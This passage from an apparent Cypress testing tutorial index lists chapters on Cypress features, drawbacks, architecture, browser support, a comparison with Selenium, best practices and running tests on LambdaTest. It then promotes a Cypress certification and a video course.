  3. Features of Cypress Testing - Learn about features that make Cypress a powerful and flexible tool for testing web applications.
  4. Cypress Drawbacks - Although Cypress has many strengths, it has a few limitations that you should be aware of.
  5. Cypress Architecture - Learn more about Cypress architecture and how it is designed to be run directly in the browser, i.e., it does not have any additional servers.
  6. Browsers Supported by Cypress - Cypress is built on top of the Electron browser, supporting all modern web browsers. Learn browsers that support Cypress.
  7. Selenium vs Cypress: A Detailed Comparison - Compare and explore some key differences in terms of their design and features.
  8. Cypress Learning: Best Practices - Take a deep dive into some of the best practices you should use to avoid anti-patterns in your automation tests.
  9. How To Run Cypress Tests on LambdaTest? - Set up a LambdaTest account, and now you are all set to learn how to run Cypress tests.


You can elevate your expertise with end-to-end testing using the Cypress automation framework and stay one step ahead in your career by earning a Cypress certification. Check out our Cypress 101 Certification.


Watch this 3 hours of complete tutorial to learn the basics of Cypress and various Cypress commands with the Cypress testing at LambdaTest.

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